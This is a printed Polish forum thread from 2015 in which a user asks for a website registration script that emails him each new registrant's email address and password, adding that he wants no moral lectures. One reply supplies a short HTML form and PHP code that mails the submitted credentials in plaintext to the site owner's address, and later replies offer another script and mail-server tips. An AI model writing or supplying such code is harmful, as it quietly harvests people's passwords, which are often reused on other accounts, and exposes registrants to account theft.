Witaj gościu! Zaloguj się lub Zarejestruj aby móc korzystać ze wszystkich funkcjonalności jakie oferuje to forum! Rozpocznij zarabianie przez internet, poznaj korzysci pracy w domu! Rejestracja i korzystanie z forum jest całkowicie darmowe!
Praca w domu - Dodatkowa Praca - Zarabianie przez Internet
Skrypt rejestracja, na twój email przychodzi email i hasło osoby zarejestrowanej - Wersja do druku

+- Praca w domu - Dodatkowa Praca - Zarabianie przez Internet (https://zarabiam.com)
+-- Dział: Off-Topic (/Forum-Off-Topic-9)
+--- Dział: Programowanie (/Forum-Programowanie-364)
+--- Wątek: Skrypt rejestracja, na twój email przychodzi email i hasło osoby zarejestrowanej (/Temat-Skrypt-rejestracja-na-twoj-email-przychodzi-email-i-haslo-osoby-zarejestrowanej-107881)



Skrypt rejestracja, na twój email przychodzi email i hasło osoby zarejestrowanej - insanecreator - 04-02-2015 21:14

j.w., ktoś mógłby? Potrzebuje na strone.

googlowałem ale nie potrafie odróżnić skryptów wysyłających link aktywacyjny od tego który jest mi potrzebny. Mianowicie rejestracja, która wysyła podany email rejestracji. Mógłby ktoś pomóc bez odsyłania do lmgtfy etc. Nie potrzebuje także moralnych porad jakie to złe Smile

Z góry dzięki Smile


RE: Skrypt rejestracja, na twój email przychodzi email i hasło osoby zarejestrowanej - RaiZeN - 08-04-2015 17:31

Jeśli masz przykładowo formularz taki:
Kod:
<form action="register.php" method="POST">
<input type="email" name="email" /><br />
<input type="password" name="password" /><br />
<input type="submit" name="submit" value="Zarejestruj sie">
</form>


To dodajesz na tej samej stronie taki kod:
Kod:
<?php
$email = $_POST["email"];
$pass = $_POST["password"];

if(isset($_POST["submit"])) {
if(mail('[email protected]', 'Temat wiadomosci', 'Email: '.$email.'<br />Haslo: '.$pass))
   {
      echo 'Wiadomość została wysłana';
   }
}
?>

Jeśli w formularzu masz np. name="123email" to zmieniasz w pierwszej linijce kodu php "$_POST["email"];" na "$_POST["123email"];", tak samo przy haśle i guziku. Oczywiście musisz mieć włączoną funkcję mail() na serwerze. Wink


RE: Skrypt rejestracja, na twój email przychodzi email i hasło osoby zarejestrowanej - Cavedi - 08-06-2015 17:37

Jak nadal potrzebujesz, napisz do mnie na priv, oddam Ci za darmo skrypt rejestracji który:

Wysyła email z loginem, hasłem oraz linkiem aktywacyjnym.

Dodaje dla usera, IP rejestrację, datę rejestracji, email, hasło, login + klucz aktywacyjny.


RE: Skrypt rejestracja, na twój email przychodzi email i hasło osoby zarejestrowanej - CCash2 - 19-09-2015 18:42

Funkcja mail wysyła maile, ale musisz mieć skonfigurowany serwer jeśli używasz vps.